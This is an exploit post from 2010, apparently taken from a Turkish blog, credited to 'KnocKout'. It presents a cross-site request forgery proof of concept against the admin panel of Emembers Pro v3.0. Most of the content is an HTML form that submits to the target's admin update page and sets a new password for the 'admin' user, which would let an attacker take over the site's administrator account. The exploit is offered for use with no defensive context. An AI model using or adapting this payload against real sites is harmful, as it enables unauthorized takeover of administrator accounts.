~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Emembers Pro
|~Price : N/A
|~Version : v.3.0
|~Vulnerability Style : Cross Site Request Forgery
|~Vulnerability Dir : /admin
|~Google Keyword : N/A
|[~]Date : "07.12.2010"
|[~]Tested on : (L):Vista (R):Demo
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Cross Site Request Forgery POC EXPLOIT~~~~~~~~~~~}|
<form method=post action="http://$TARGET/$DIR/admin/update.asp?mode=admin">
<TD class=Font1>Username<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT class=field size=15 name=username value="admin"></TD>
<TD align=left width="6%">
&nbps;</TD>
</tr>
<tr>
<TD class=Font1>Password<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT type=password class=field size=15 name=pw ></TD>
<TD align=left width="6%">
&nbps;</TD>
</tr>
<tr>
<TD class=Font1>Confirm Password<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT type=password class=field size=15 name=pw2 ></TD>
<TD align=left width="6%">
&nbps;</TD>
</tr>
<TR >
<TD vAlign=top align=middle class=text>
<INPUT type=image src=images/update.gif name=submit0></TD></TR>
<TR class=tblBG>
<TD width="45%">
</TD></TR>
=============================================================
Hiç yorum yok:
Yorum Gönder